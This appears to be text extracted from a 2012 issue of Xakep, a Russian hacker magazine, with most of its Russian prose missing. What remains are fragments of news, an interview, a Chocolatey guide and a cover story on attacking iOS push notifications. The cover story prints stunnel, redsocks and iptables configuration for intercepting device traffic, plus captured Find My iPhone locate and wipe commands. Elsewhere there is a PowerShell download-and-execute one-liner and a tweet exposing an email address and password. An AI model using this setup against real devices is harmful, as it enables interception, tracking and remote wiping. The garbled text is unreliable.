Вы находитесь на странице: 1из 148

056

WWW.XAKEP.RU

-
highload

PHP-CGI

07 (162) 2012

: 230 .

018

, IOS


024


MAIL.RU GROUP

032


WINDOWS

076

SCALA?










'HOO



YourDellSolution.com/ru

Dell PowerVault

Dell EqualLogic

Dell Compellent

step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

UNIXOID SYN/ACK
MALWARE


PR-

step (step@real.xakep.ru)
(goltsev@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

(vagizova@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)



PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906




-


.: (495) 935-7034, : (495) 545-0906


, ,
.
. Google Street View .
. URL.
,
, . , ,
3-4 .

. , ,
, .
?
, ,

. , Android
, Google
GTalkService
.
Apple Push Notification Service iOS.
,
.
, ,
iPhone' ,
.
step, . . ][
twitter.com/stepah



TECHNOLOGY

CORPORATE
-

(zinaidach@glc.ru)
(filatova@glc.ru)
(polikarpova@glc.ru)
(melnikova@glc.ru)
(kachurin@glc.ru)
( )
(tatarenkova@glc.ru)
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 217 600 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012

Content

014

HEADER
004
011

MEGANEWS

hacker tweets
-

10 60

WEBBY AWARDS 2012

016
017


LEGO
Proof-of-concept
Google reCAPTCHA 99,1%

COVERSTORY

024


Mail.Ru Group

COVERSTORY

018
iZombie,
SSL
iOS Wi-Fi-

110

116

PCZONE
032

036

040



Chocolatey
?




044
048
052
056
060
064

Easy-Hack



SMBRelay
SMBRelay Windows 7
VMware vCenter

PHP:
PHP-CGI
X-Tools

MALWARE
066

070

drive-by -

drive-by

-

094

UNIXOID
102
106
110

080

086

090

Scala-
Scala
,



Crypto++ RSA

,



GNOME: GTK+ GNOME Shell

suckless.org

, , Android

SYN/ACK
116
122

128


UTM-

nginx + PHP-FPM + test-cookie + geoip
+ Naxsi

Microsoft

132

Do Not Track

FERRUM
134

076

HighLoad. #1

!

Intel X79 Express

139
140
144

8,5
FAQ
FAQ
WWW2
web-

MEGANEWS
WE ARE THE CHAMPIONS
ACM-ICPC

2012 International Collegiate Programming Contest (ACMICPC). ,
, IBM,

.
ACM-ICPC, . : 8500 2219
85 , 112 ,
- ,
( ). 2004, 2008 2009 ,
.
,

.
IBM, .
, -

ACM-ICPC-2012 ,
. !




ACM-ICPC

. ,
, 37-


2013 .

10 YOTA
LTE.
14

LTE.

004

RIM BLACKBERRY 10,


QNX.
,

.



, ,
Symantec.

GOOGLE

oogle , ,
. ,
- ,
Street View ,
Wi-Fi ( , ).

. , .
IT- , , ,
,
. FCC Google
e-mail , .
Street View. ,
Wi-Fi .

SONY:

,
5,7 .

:
,
108 035 1800
!

WESTERN DIGITAL SCSI


Trade Association Technology
SSD- SAS,

12 /.

07 /162/ 2012

,
.

KYOCERA. , .

KYOCERA, FS-1135MFP
,
. ,
?
:
35 4
ECOSYS
,

KYOCERA. .

+7 (495) 741 00 04 www.kyoceradocumentsolutions.ru

KYOCERA Document Solutions www.kyoceradocumentsolutions.com

MEGANEWS

2012 , Sophos.

INTEL

INTEL -
Intel, ,

Raspberry Pi. Raspberry
Pi


,
iPad
.

, Intel ,
. PAX East,
-, NUC
(Next Unit of Computing), . 1010 !
VIA Pico-ITX, 107,2 ,
VIA Nano-ITX (1212 ). NUC
, Core i3/i5
Sandy Bridge Intel HD
3000 DDR3 (
SO-DIMM). NUC ,
. .
Thunderbolt, USB 3.0, 802.11 b/g/n HDMI.
NUC 100 .
.

MICROSOFT , CONFICKER

MICROSOFT
SECURITY INTELLIGENCE
REPORT,
2011
CONFICKER
1,7
006

PROOF-OF-CONCEPT

. TapLogger,
Android OS, ,

.


(, ).
, ,

.
, .
TapLogger ,
. - ,
.
TapLogger
.
,
PIN-.
PIN-

,
.
,

.
PIN-.
: ,
PIN-
10 000 .
TapLogger, 81
!
PIN-,
, TapLogger
729,
80%.

Android, . TapLogger ,

,
, Windows 8 BlackBerry
OS.
iOS-. : Android
,

, , .
: cse.psu.edu/~szhu/papers/
taplogger.pdf.

07 /162/ 2012

MEGANEWS

MICROSOFT Security Essentials 4.0.

TORRENT

CHROME
1
CHROME .
, Google
Chrome, . Google 20
2012 , ,
Chrome ,
.
StatCounter, Google Chrome
,
Firefox . ,
Microsoft Internet Explorer.
I
, . Chrome
, , 20
Google IE, , ! , IE
. 2011 43,9%
31,4%, Chrome ,
, 20% 32%.
, Chrome ,
- . , Internet Explorer
Chrome 30,9% 27,1%.
Microsoft
72,3% ( 86,9%,
).
:
Google Chrome
,
Opera.

CERT Torrent
( uTP) - .

, .
,
IP-.
uTP
. uTP
,
23 ! IP-
,
, ,
, , , .
. :

; -
;
; . ,
Pirate Pay.
Microsoft,
-,
-.



uTP
. ,


CERT.
2011:

183
UDP
(~0,2% )
2012:

957
047
UDP
(~45% )




iPhone.
200 .
VK
Messages ( VK)
21- .
Objective
C!
2,5 .
VK
Android.

008

2011 4,5
,


12,5 ,
Group-IB.



- The
Pirate Bay, ,
.

07 /162/ 2012

MEGANEWS

13 eMule eDonkey2000.

SAMSUNG GALAXY S III


SAMSUNG
Samsung Mobile Unpacked 2012,
, GALAXY S.
Super AMOLED 4,8
1280720 . : 8- ( BSI)
,
1,9- , HD- 30 .
Android 4.0 (Ice
Cream Sandwich).
. ,
Samsung Galaxy S III SC-06D Snapdragon S4 (
) 2 RAM,

Exynos 1 RAM.
Samsung . ,
16 32
, 64 .
microSD ( 64 ).
2,5G (GSM/GPRS/EDGE) 850/900/1800/1900 , 3G
(HSPA+ 21 /) 850/900/1900/2100
4G LTE.
Wi-Fi 802.11 a/b/g/n, GPS/
GLONASS, NFC Bluetooth 4.0 (LE). Samsung Galaxy S III
Wi-Fi Channel Bonding,
Wi-Fi.
2100 .
136,670,68,6 , 133 .
:
. ,
( ) -. ,
,
Samsung.
,
Apple . GALAXY S III Android 4.0 , ,
, .

:
, . S
Voice
, , , .
, , ,
: - ,

.
Smart stay
,
!
Android Beam S Beam, ,
Samsung Galaxy S III.
1 , 10 . ,
, , ,
. :)
5 .
GALAXY S III 16
29 990 .
,
.

KICKSTARTER PEBBLE E-PAPER





10

!
010

07 /162/ 2012

#hacker tweets
@mubix:

, ,
. #_

@cBekrar:

, Adobe , Photoshop, Illustrator


Flash Pro . http://bit.ly/J7Wr5U

@ruddy_ru:

:
.


VirtualBox' ,

. . :(

@jduck1337:

Adobe .
... ,

, .

Google
Chromium Blog: Fuzzing for Security
http://t.co/mAX3TTIn.
:


,
Google? .

@joshcorman:

,
@haroonmeer #ITWebSec

@davienthemoose:
@i0n1c:

Apple ID +
,

iCloud

.
CEH
- :(. ,
! #BsidesChicago
:

@ajitbtw:

@i0n1c ajitbtw@gmail.com Pass Ajit12345

CEH
. ,
!

:)
@msimoni:

,
Null.

... http://t.co/nuFcEL1K
:


. :)

@JohnLaTwC:
@i0n1c:

,

,
, .
:

@mwtracker:

CVE-2011-0611: Flash PDF


PDF
, .
:

, ?

www.surfpatrol.ru.

07 /162/ 2012

-2. ,
PHP
( .php?-s).
Apple,
iPad3.

, ,
Word , SEH
SHE.
:

(. SEH Structured Exception


Handling) Microsoft
Windows, ,
.

@MarkWuergler:

zero day.
- - , , , ,
, -.

011

MEGANEWS

FACEBOOK . 2012- 901 .

3D-

,
Cube 3D-
.

3D-
Solidoodle,

499 .


3D-. , , The
Pirate Bay ,
. :). , 3D- ,
,
. ,
3D- . 3D- Cube
CES 2012 Cubify.
(Plastic
Jet Printing, PJP). 141414 ,
, , 250
. (262634 ) 4,3 (
). Cube
Wi-Fi 802.11b/g. 1299 .
50 , ( ). ,
1314 .

2013 Ahlstrom
EasyLife,
.

Wi-Fi! :)

012


1525
VPN-,

Cybernorms.
VPN 40%.

GOOGLE

3133,7 20 000
.

PHP


-
CVE-20121823 PHP-CGI,
,
Reddit.
Eindbazen. , 2004
PHP - =
. CGI RFC, =

, . 2004
PHP ,

?-s URL PHP-
-s PHP-CGI. PHP ,
,
.
safe_mode, allow_url_include,
- ini. PHP Group PHP 5.3.12 PHP 5.4.2,
.
.
PHP: .

DVD
Windows
8
DVD Media
Player .
VLC Media Player Classic
!

APPLE ITUNES


(jailbreak).

:
j*******k.

07 /162/ 2012

SOPHOS, Mac Windows, Mac OS X.

MICROSOFT SKYPE
VOIP-
Microsoft VoIP Skype 8,5 .
,
, ,
Skype. , ,
:
,
. , Skype
P2P-: , , , ,
, .
,
.
48
, 800 .
Microsoft
. Immunity Security , Microsoft

Linux,
GRSecurity.
,
, Microsoft.
4100 ( 41 )
.
, -
Skype
. , ,

,

. , , -
P2P- ,
,
Skype , .
Skype, , Skype
5.5 , IP- ,
. , , Pastebin (pastebin.com/rBu4jDm8).
, , Microsoft
,
P2P-. , Microsoft ,
-.
- .

FOXCONN APPLE

FOXCONN
,


IPANEL (ITV)
07 /162/ 2012

013

MEGANEWS

2000 ICANN, ., ..

WEBBY AWARDS


-


( ). ,


.


.

Webby
Awards
16 . 10 60

2012 .

Webby Awards -,
. Webby - , -, ,

. .
Skype / (
). ,
Super 8
.
Evernote
. Dropbox :
- -.
Pinterest () Google+ ();
Pitchfork Pandora.

Webby Awards 2012 ,


: Instagram
, Facebook
.



,
,
.
, , , . ,
?
!
,
Pegasus Global Holdings
CITE, .
, ,
: ,
.
; -
-.
, , ,

: ,
, ,
. ,
Pegasus Global Holdings, - .


Firefox Chrome


. ,

,
,
SSL-.

.
, , -
.

014

NMAP 6
(NMAP.ORG/6),
3924
.
348,
Zenmap GUI.

DDR4
. Samsung
Hynix Micron
Technology .

07 /162/ 2012

APPLE: .

MICROSOFT

Apple
,
Windows 8


.


Microsoft,


.

Windows 8
, Microsoft
. , HomeOS ,
, , ,
, . , Microsoft
:
, . ,
HomeOS 48
12 . , , .
,
.
, C# .Net Framework 4.0 .
: ,
.
HomeStore,
,
HomeOS. ,
, Microsoft
.
, , , Microsoft.
,
Kinect. , Microsoft Research

SoundWave.
,
. ,
SoundWave . 1822 ,
,
. .
- ,
API-.
SoundWave ,
/ /,
. , :
90100% (
). ,
, SoundWave
Metro Windows 8,

.



NASDAQ,
-
FACEBOOK
30

07 /162/ 2012

015

HEADER


LEGO
GOOGLE BLOCKLY

, . bit.ly/
KPh7fO ,
.
Blockly Google. ,
( ,
) . Blockly
,
LEGO.

: , ,
if-then- ,
. ,
,
,


Scintific American 1986 :).
, Google Scratch.


(scratch.mit.
edu).
?
Blockly

Python, JavaScript

016

Blockly

Dart. ,
. : ,
, :).
, Blockly
-
, . , - :).

APP INVENTOR
Scratch, , . , App
Inventor (appinventoredu.mit.edu), , ,
- ,

Android.
WYSIWYG-
. ,
Scratch.

- .
,
Java-. , ,

, Google Play.

, Scratch, stencyl (www.stencyl.com).


,
2D-,
iOS (
iPhone iPad), Flash (
). :

Android HTML5.
,
.
.
,
?
:). z


Stencyl

07 /162/ 2012

Proof-of-Concept
GOOGLE RECAPTCHA
99,1%

?
,
- CAPTCHA.
, ,

. , , .
,
CAPTCHA API. , ,
reCAPTCHA (recaptcha.net).
,
,
, reCAPTCHA
.
.
, OCR-
, , .
, . : ,
,
(, 2009 Google).

Google Streets
View. :
. ,

Layer One DC949 (dc949.org)


Stiltwalker,
Google reCAPTCHA 99,1%.
:).

?
,
. , ,
reCAPTCHA , .
:
, .
,
, , . DC949?

(. ). ,
.
, reCAPTCHA
58 .
Open Source Hash (www.phash.org)
. ,
, 58 .

30%. . ,
50 reCAPTCHA
MD5,
99,1%- .

07 /162/ 2012


( Linux).
Stiltwalker Layer
(bit.ly/NAJ4Ja). 99,1%
reCAPTCHA,
. Stiltwalker
Google ,
reCAPTCHA . ,
, Stiltwalker
. z

017

COVERSTORY

(a2f3x7@gmail.com)

SSL

IOS
WI-FI-
018

iPhone
iPh
iPad
iP d
,
Apple. ,
,

. :
-
?
07 /162/ 2012

iZombie,

, iPhone/iPad. ,
, Apple .
, ,
. - , -

. , Apple,
, Apple ,
, . -,
Apple !
,
. - ,

. , : !

PUSH?
, iOS
. Apples Push Notification Service (APNs),
Push.
SSL ( payload
256 ) ,
Apple
. iOS ,
iPhone iPad
. ,
(CA) Apple
(, , ). iOS , ,
Apple , SSL- 5223-
. :
iOS , CA,
,
.
Apple , APNs . , ,
APNs iOS. .
SSL-
, , ,
.
, .
, iOS Apple
ACK- (0d 00 00 00 00 )
.
APNs? , ,
iOS. ,
. :

APNS iOS-

iPhone ( fmip, ). , , .
:

? , -, .
MITM-, Apple , CA, .
iPhone, :
1. .
2. SSH root.
3. CA.
4. private/var/Keychains nimble.
5. push-bin.crt
push-bin.key ( DER PEM).
6. stunnel :

{
"serverContext":{
"tapSendTS":"2012-05-08T18:55:36.668Z",
"tapSendContext":"fmip"
}
}

, , ,
Apple iCloud Find my

07 /162/ 2012

ACK- (0d 00 00 00 00), iOS

019

COVERSTORY

[apple_mitm_push_s]
accept = 0.0.0.0:5222
connect = 127.0.0.1:9500
cert = /home/attacker/CA/courier.push.apple.com.pem
# push-,
# CA
key = /home/attacker/CA/courier.push.apple.com.key
[apple_mitm_c]
cert = /home/attacker/CA/push-cert.pem
key = /home/attacker/CA/push-key.pem
# ,
# Apple
client = yes
accept = 0.0.0.0:9500
connect = 17.149.36.129:5223
# Push- Apple

, port-forwarding ( iptables
), 5223-
5222.
,
Push .
3 , .

IOS?
iOS, iPhone/iPad,
(
UNIX).

,
, ,
, ,
Security Server (securityd). ,
. , ,
Apple (, ), SQLite keychain-2.db,

020

3
.
securityd-
Apple.
securityd:
1. CA Apple,

keychain-2.db. Apple , .
iOS
.
2.

(CA).
CA, ,
CA .
, .
, , SSL-,
iOS ,
: . ,
.

CA IOS
iOS:
;
;
MDM (Mobile Device Management).
, MDM
. ,

, :
1. .
2. .

07 /162/ 2012

iZombie,

WWW

INFO


securityd Apple:
bit.ly/K1bAGs;
BLOBFORMAT:
bit.ly/K1bJtI;

Push Notification:
bit.ly/iCdRmd;

Notification Payload:
bit.ly/eVWx7j.


,

.

,
,

, udid
URL,

.

WARNING
,

,

,
.
!

. .

3. ~99% iOS .

Android
, Google

APNs , , ,


.
C2DM (Cloud to Device
Messaging Framework),

Android-
(bit.ly/nsvWcb).

, ,

-. redsocks (darkk.net.ru/redsocks)
:

! :)
. , iPhone Splashscreen
( , hotspot) ,
, ,
.

- .
, , Wi-Fi ,
( , , aireplay-ng
) , . :
1. .
2. splashscreen.
3. .
. .
, hotspot , SSL-
. ,
iPhone/iPad securityd, , ,
PayPal App Store

MITM ?
MITM-
, , :
1 CA c OpenSSL.
2. ( ChilliSpot,
www.chillispot.info). splashscreen
iPhone -
, iWebkit.
3. SSL-

07 /162/ 2012

base{log_debug = on; log_info = on; log = "file:/tmp/


reddi.log"; daemon = on; redirector = iptables;}
redsocks { local_ip = 0.0.0.0; local_port = 31337;
ip = 127.0.0.1; port = 31338; type = http-connect; }

iptables:
iptables -t nat -N REDSOCKS
iptables -t nat -A REDSOCKS -d 0.0.0.0/8 -j RETURN
iptables -t nat -A REDSOCKS -d 10.0.0.0/8 -j RETURN
iptables -t nat -A REDSOCKS -d 127.0.0.0/8 -j RETURN
iptables -t nat -A REDSOCKS -d 169.254.0.0/16 -j RETURN
iptables -t nat -A REDSOCKS -d 172.16.0.0/12 -j RETURN
iptables -t nat -A REDSOCKS -d 192.168.0.0/16 -j RETURN
iptables -t nat -A REDSOCKS -d 224.0.0.0/4 -j RETURN
iptables -t nat -A REDSOCKS -d 240.0.0.0/4 -j RETURN
iptables -t nat -A REDSOCKS -p tcp --destination-port \
443 -j REDIRECT --to-ports 31337
iptables -t nat -A REDSOCKS -p tcp --destination-port \
80 -j REDIRECT --to-ports 31339
iptables -t nat -A PREROUTING -i at0 -j REDSOCKS

, . (443
80) ,
( HTTP Burp
Proxy). HTTPS Redsocks (
, darkk
).
4. Redsocks Charles Proxy
(www.charlesproxy.com), 31338- .
,
, .
.

021

COVERSTORY
MITM-
,
.

! ! !
, ,
Push.
, ,
iPhone , . APNs-,
,
. Push- iOS
,
, :
{
"serverContext":{
"tapSendTS":"2012-05-08T18:55:36.668Z",
"tapSendContext":"fmip"
}

, SSL, !

, fmip
Find My iPhone. , iOS iCloud, HTTPS (
HTTP
).
POST- (
) (
):

App Store

{
"endThreshold": 10,
"ackURL": "https://p02-fmip.icloud.com:443/
fmipservice/findme/403955807/7be6fa307846b67
0f0346c00af720c347f5f1eb8/ackLocate",
"decayFactor": 0.7,
"desiredAccuracy": 40,
"startThreshold": 2000,
"locationValidityDuration": 120,
"id": "6df3ff6f-f365-499e-b921-93641206bffa",
"enqueueTimestamp": 1336505766732,
"cmd": "locate",
"includeTrackingInfo": false,
"overridenCommandDomain": null,
"locationTimeout": 120,
"findMyiPhone": true,
"responseTimeStamp": 1336505766732

{
"deviceInfo": {
"buildVersion": "9B176",
"aps-token": "285cdaffeb5f8767233ebdfe3a2df07
797ae864e586ce902c321f222f84d333",
"passcodeConstraintStr": "Enter a four-digit passcode.",
"deviceColor": "black",
"productVersion": "5.1",
"batteryLevel": 0.1292443,
"deviceName": "iPhone test",
"locationServicesEnabled": true,
"findMyiPhone": true,
"productType": "iPhone2,1",
"udid": "7beafa302d46b670f0657c00af720c347f5f1eb8",
"passcodeConstraint": "simple",
"deviceClass": "iPhone",
"batteryStatus": "Charging",
"passcodeIsSet": true
},
"serverContext": {
"tapSendContext": "fmip",
"tapSendTS": "2012-05-08T21:05:37.132Z"
},
"deviceContext": {
"deviceTS": "2012-05-08T21:05:38.210Z"
}
}

.
,
. : ? ,
iCloud. , ,
, iCloud
:

022

( ) :
{
"locationFinished": false,
"deviceContext": {
"cmdId": "6df56f6f-f445-499e-b921-93641006bffa",
"deviceTS": "2012-05-08T19:36:11.391Z"
},
"deviceInfo": {
"udid": "77be6fa307846b670f0346c00af720c347f5f1eb8"
},
"alt": 141.3043212890625,
"positionType": "Wifi",
"vertAcc": 10,
"longitude": 37.5862605508342,
"latitude": 55.72784808181711,
"statusCode": 200,
"timestamp": "2012-05-08T19:36:09.195Z",

07 /162/ 2012

iZombie,

"horizontalAccuracy": 71.1873037658878

"findMyiPhone": true,
"productType": "iPhone2,1",
"udid": "7beafa302d46bffff0346c00af720c347f5f1eb8",
"passcodeConstraint": "simple",
"deviceClass": "iPhone",
"passcodeIsSet": true
},
"overridenCommandDomain": null,
"message": "",
"statusMessage": "OK",
"verifyURL": "https:\/\/p02-fmip.icloud.com:443\
/fmipservice\/findme\/408888807\/0346c
7802d46b670f0346c00af720c347f5f1eb8\/wipeVerify",
"cmd": "wipe",
"pin": "",
"cmdContext": {
"ackURL": "https:\/\/p02-fmip.icloud.com:443\
/fmipservice\/findme\/408888807\/0346c
7802d46b670f0346c00af720c347f5f1eb8\/ack",
"message": "",
"id": "06c0a5f9-5126-4428-b875-59acbb956714",
"verifyURL": "https:\/\/p02-fmip.icloud.com:443\
/fmipservice\/findme\/408888807\/0346c
7802d46b670f0346c00af720c347f5f1eb8\/wipeVerify",
"enqueueTimestamp": 1336510929036,
"cmd": "wipe",
"responseTimeStamp": 1336510929032,
"pin": "",
"overridenCommandDomain": null
},
"statusCode": 200

GPS-,
? :)
wipe, . ,
,
:
{
"message": "",
"id": "06c0a5f9-5126-4428-b875-59acbb956714",
"enqueueTimestamp": 1336510929036,
"cmd": "wipe",
"pin": "",
"overridenCommandDomain": null,
"ackURL": "https://p02-fmip.icloud.com:443/
fmipservice/findme/408888807/0346c
a302d46b670f0346c00af720c347f5f1eb8/ack",
"responseTimeStamp": 1336510929032,
"verifyURL": "https://p02-fmip.icloud.com:443/
fmipservice/findme/408888807/0346c
7802d46b670f0346c00af720c347f5f1eb8/wipeVerify"
}

, 408888807/0346c 7802d4
6b670f0346c00af720c347f5f1eb8/ URL ( ,
). id
: - , . ,
,
verifyURL :
{
"id": "06c0a5f9-5126-4428-b875-59acbb956714",
"ackURL": "https:\/\/p02-fmip.icloud.com:443\/
fmipservice\/findme\/408888807\/0346c
7802d46b670f0346c00af720c347f5f1eb8\/ack",
"deviceContext": {
"deviceTS": "2012-05-08T21:05:39.604Z"
},
"enqueueTimestamp": 1336510929036,
"responseTimeStamp": 1336510929032,
"deviceInfo": {
"buildVersion": "9B176",
"aps-token": "285cda0ffeb5ff767233ebdfe3a4df07
797ae864e586ce902c321f222f84d333",
"passcodeConstraintStr": "Enter a four-digit passcode.",
"deviceColor": "black",
"productVersion": "5.1",
"batteryLevel": 0.1292443,
"locationServicesEnabled": true,

,
IOS



07 /162/ 2012

200 ( 200 HTTP--,


), iOS , , !
: wipe iPhone,
soft reset . ,
, .
- ,
iCloud.

. ?

Apple, .
, :
1. . ,
wipe locate .
2. (
).
3. .
,

, . 1001- :
, , , . Apple, , ,
,

- ,
. ? z

023

COVERSTORY

0000000000

Mail.Ru
01 .
20

2005
,

Mail.Ru Group.

c OS X
Ma .

.

,
C 6 0 23-00.
11-0

MAIL.RU

Mail.Ru , - .
, , -.
, . Mail.Ru UNIX, Mail.Ru Group
, .
024

07 /162/ 2012

MAIL.RU
60 200 .



. . , ,
, .
Mail.Ru , .
, .
,
, , , 2005
.
Mail.Ru
60 200 .

, .
, .
,
. - ,
. ,
.
, .
,
-
. ,
,
.
11 , 8 .

,
,

, .
-
. ,
,
. ,
,
, ,
,
.
,
.
, ,
.
, , ,
.
, ,
, ,
,
, -
.

.
.


.
-
,
.
.
, .
. :)

R&D
. ,
, ,
.
/
, .
.

.
:
,
,
/++. Perl
, , , C. Python
- Ruby.

Perl , ,
. , .
Perl-.
, ,
. ,
. Perl,
.
.

MAIL.RU GROUP
.
, .

, .
2003 . ,
ICQ,
,
, , .
ICQ?
.
, ,
ICQ .
,
Mail.Ru ( , ,
, IT-).
, ICQ,
, Mail.Ru Group.

. -

07 /162/ 2012

Mail.Ru

025

COVERSTORY

Mail.Ru Group :)

:
.
commit ( ),

( )
.

,
. -
,
,
. , ,
,
.
,
, .
,
, , -
.
, Open
Source Linux. ,
,
- .

, Open Source

, .
,
, , .
, .

026


- . . , ,

,
. , ,
- nginx, .
. Mail.Ru
Group -

, ,
.
. Hadoop
Hbase , . ,
,
.


. -

Mail.Ru ,

07 /162/ 2012

Mail.Ru Group

Sound Team

:
( ),
,
. , .
, ,
Open Source Tarantool. , ,
. , ,

.
, ,
,
- , .
key-value storage,
,

.
Tarantool key-value .
,

,
.
, ,
.
,
.
, .

07 /162/ 2012

Open Source ?
, .

.
, , .
, MySQL. ,
Open Source . - ,

. , ,
, , .
MySQL Open Source
: , . .


-,
. , ,

- .
: - ,
.

. ,
-
.
- ,
,
( ).
Mail.Ru Group
,
280 /. ,
, , , ,
. -.
.
, ,
.
, .
, .
, 24
,
.
-, ,
. ,
, .
, ,
,
,
, .
.
,
,
. , ,
, , ,
Ethernet
, .
,
.
, setup

.
() . ,
.

,
OPEN SOURCE ,
027

COVERSTORY
,
. ,

Ethernet.


Futubra .
, .
,
. , , (
, Mail.Ru Group ),
-
, .
,
: . ,
,
.
. Futubra ,
,

.
, Mail.Ru Group
. .


, .
MySQL,
NoSQL Tarantool.
, nginx Apache,
fork Exim, ,
DNS-. ,
, .
,
.
, ;
-,
. ,
. ,

,
. 13
,
. , ,
,
c .

, . ,
, ,
. . ,

, .
, Linux IPVS. -,
( :
Mail.Ru Group ). -,
.
,
.

, Instant
Messenger. ,

.
150 000 , . ,
.
Mail.Ru
,
. , - ,
.

, , -
, . .
, ,
: , ,
. ,
.
,
.
, - ,
.

MAIL.RU GROUP

@Mail.ru


,
,
DDOS'
028

DDoS, ,
.
DDoS, , .
,
,
.

, ;
, .
, ,
.
, . ,

.

07 /162/ 2012

Mail.Ru Group

,
, ,
. , ,
. IDS,
.
, ,
. , . ,

,
. ,
,
, .

production-. ,
, . ,
- ,
- ,
, ,
.
,
penetration testing.
-
- . ,
. ,
,
, .

MAIL.RU GROUP
,
Mail.Ru Group.
, , ,
,
IT-, .
,
. ,
:).

- :)

,
. , .
, .
, 1011 .
, . , 24
, ,
, ,
, , .
.
, ,
- , .

. , , . ,
,
. ,
.
Mail.Ru Group .
, . , .

, . ,
, .

IT-

IT-. ,
, , IT-,
,
IT-.
,
.

07 /162/ 2012

,
. ,
. , IT-
, Mail.Ru
Group
.
:
. .
, , ,
IT-
.
,
.
,
, .
: Russian Code Cup. ,
,

,
,
, IT-.
,
,
.
: . ,
. :
, .
,
- . ,
.
20 UNIX- , Kris Buytaert, Garrett Honeycutt,
Joshua Thiessen, , ,
Mail.Ru Group. z

029

Preview

26 .
.

60

PHP-CGI
Ruby, Python

,
- - PHP.

,
, , -
, .

,
.
,
, PHP
CGI.

PC ZONE

32


Microsoft
,

Chocolatey.

36

?


RapidShare
.

030

MITM,

.



.
SVN, Git, Mercurial.

MALWARE

SMBRELAY

52

40

56

VMWARE VCENTER
, ,
.

66

: ?
-

drive-by-download
.

07 /162/ 2012

PC ZONE

anatooly, - (anatooly@gmail.com)




CHOCOLATEY

,

Linux
Microsoft Windows.

,
.
,
. , Chocolatey.
032

, Windows?
, .
,
- . , , - (, ),
. , ( ). ,
. ,

.
.
,
. Linux-
: , !. ,

07 /162/ 2012

,
.NET Framework 4.0 PowerShell 2.0. ,
. 7-Zip:

MICROSOFT


,
CHOCOLATEY

cinst 7zip

, . . , , ,
, Chocolatey. , :
.
, , , ,
.
,
, .
cinst
.

(
). Ubuntu apt-get ,
.
Microsoft
( , , - Windows 8),

Chocolatey (www.chocolatey.org).


Chocolatey . ,
:


, , Chocolatey.
, (chocolatey install/update/list),
(cinst/cup/clist). :

@powershell -NoProfile -ExecutionPolicy unrestricted \


-Command "iex ((new-object net.webclient).
DownloadString('http://bit.ly/psChocInstall'))"

CHOCOLATEY


Kindle:

PDF:

Sublime Text 2

Notepad++

07 /162/ 2012

PHP

Foxit Reader

Ruby

PDFCreator

Python

Inkscape

FTP-:

Calibre

Adobe Reader

Dropbox

Programmers
Notepad

Notepad2

FileZilla

Node.js

Hg

TortoiseHg

MySQL

WinRAR

KeePass

VLC

TortoiseGit

MongoDB

7-Zip

Evernote

foobar2000

PostgreSQL

SQL Server
Express

Skype

SQLite

033

PC ZONE
1. . :
cinst dropbox

SSH- Windows PuTTY


:
chocolatey install putty
chocolatey install putty -version 0.61

:
chocolatey install putty -source c:\somefolder
chocolatey install putty -source \\someserver\someshare
chocolatey install putty -installArgs "/qb" -override

2. . Chocolatey
:
cup dropbox

:
chocolatey update all

3. .
:
clist dropbox


:
chocolatey /?

?
, Chocolatey
NuGet.
.NET-,
. Chocolatey ,
. Chocolatey, NuGet.exe,
, ,
. -

cURL, curl.nuspec

: Install-ChocolateyInstallPackage, Install-Get-ChocolateyUnzip,
ChocolateyDesktopLink ,
, , .
, ,
:
1. C:\Chocolatey\lib.
2. , Chocolatey
( path),

.
3.
chocolateyInstall.ps1. ,
:

PowerShell. , (
), .
4.
-, .
, , .
,
UAC.
. , -

WINDOWS


,


.

Windows
, Windows 8 ,
.

034

Ninite
ninite.com

. :
,

,
.

.

Allmyapps
allmyapps.com
,
15 -.
.
,

. ,
-
,
.

07 /162/ 2012

,
( ).
, , . (,
), .
C:\Chocolatey\lib.

WWW

:
chocolatey.org;


Apache-:
github.com/chocolatey/chocolatey;


:github.com/
ferventcoder/nugetpackages.


Chocolatey . ,
. , ,
, .
-
.NUPKG. XML- ( .NUSPEC) tools (
chocolateyInstall.ps1) , .
cURL.

curl.nuspec.
. tools
cURL (libcurl.dll,
libssl32.dll) curl.exe.
:

INFO

PuTTY

.




\S,
\quite.

nuget pack

curl.7.25.0.nupkg

. , :
C:\Chocolatey\lib\curl.7.25.0 .
Chocolatey.

Chocolatey apt-get Windows. ,


Chocolatey ,
. ,
,
IDE,
. -

CoApp
coapp.org
,
Microsoft,
, Open Source .
CoApp
, ,
.
, , .

07 /162/ 2012

Chocolatey NuGet

, Chocolatey
,
. ,
-
. , ? , ! z

ZeuAPP
zeusoft.net/products/zeuapp
,
,
.

ZeuAPP ,
, , .

SUMo
kcsoftwares.com
Software Update Monitor, .
SUMo

(, ) .
, ,
, .

035

PC ZONE

, - (yani@yani.ru)

.


, .
, ,
Nekaka.com.
036

:


(rapidshare.com).
, .
.
: YouSendIt,
SendSpace, DepositFiles.
Dropbox, ( ),
. Dropbox
Google Drive Microsoft SkyDrive. -

07 /162/ 2012

Nekaka.com


, , , .
, , .

- .
(
)
, ,
( ),
. Dropboxe ,
.
-
Dropbox ,
(

).
, Dropboxe
,
, , .

?
, ,
Dropbox zalil.ru,
,
.
: , ,

. ,

, , , . ,
,
. ,
.
, Yahoo,
Hotmail AOL, .
:
.
Xenon
X3430 / 8 / 2200 Raid1 (Serverclub.
com/R210), .

Apache,
.
( ).

:
omploader, Jyraphe, FileZ, XtraFile.
.
( ,
2 ),

(
,
Upload ).
.

youdo.ru
.
nekaka.com.
,
.
(
Yahoo, Google Badoo?). ,
,
, .

. -

600 $;
1800 $;
1500 / 1800 $;
4200 $.

-:
33%;
800;

200 (1200 $ ).
100%,

07 /162/ 2012

600 + 1800*3 = 6000 $


1200*3 = 3600 $ .

2400 $
, .
:). -,
3000 -.
-,

( Dropbox)

( RapidShare). ,
,
, .

, /

.
( 1200 $)

.


;
-
,
, .
, ,
.

037

PC ZONE


. : ,
